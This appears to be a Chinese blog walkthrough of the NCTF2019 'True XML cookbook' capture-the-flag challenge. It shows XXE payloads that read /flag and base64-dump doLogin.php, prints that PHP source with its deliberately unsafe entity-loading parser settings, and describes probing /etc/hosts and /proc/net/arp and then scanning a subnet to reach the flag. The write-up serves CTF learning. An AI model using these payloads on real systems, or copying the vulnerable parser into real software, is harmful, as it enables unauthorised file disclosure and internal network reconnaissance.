NO.2-32 [NCTF2019]True XML cookbook

2 篇文章 0 订阅

抓包一看就知道可能是xxe漏洞,拿个exp直接发过去看看效果。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
 <!ENTITY exp SYSTEM "file:///flag">
 ]>
<user><username>&exp;</username><password>aaaa</password></user>

 

不能直接读flag,试一下获取源码。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
 <!ENTITY exp SYSTEM "php://filter/read=convert.base64-encode/resource=doLogin.php">
 ]>
<user><username>&exp;</username><password>aaaa</password></user>

 

<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/
 
$USERNAME = 'admin'; //账号
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
$result = null;
 
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
 
try{
        $dom = new DOMDocument();
        $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
        $creds = simplexml_import_dom($dom);
 
        $username = $creds->username;
        $password = $creds->password;
 
        if($username == $USERNAME && $password == $PASSWORD){
                $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
        }else{
                $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
        }
}catch(Exception $e){
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
 
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>%

获取到了源码。没啥用,丝毫没有看到有帮助的信息。

内网探测存活的主机,获取/etc/hosts文件

这里也没有一个可用信息,读取另外一个/proc/net/arp文件

这里就有一个ip了,尝试读取,

有报错,使用intruder扫描c段。

最后获取到flag

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值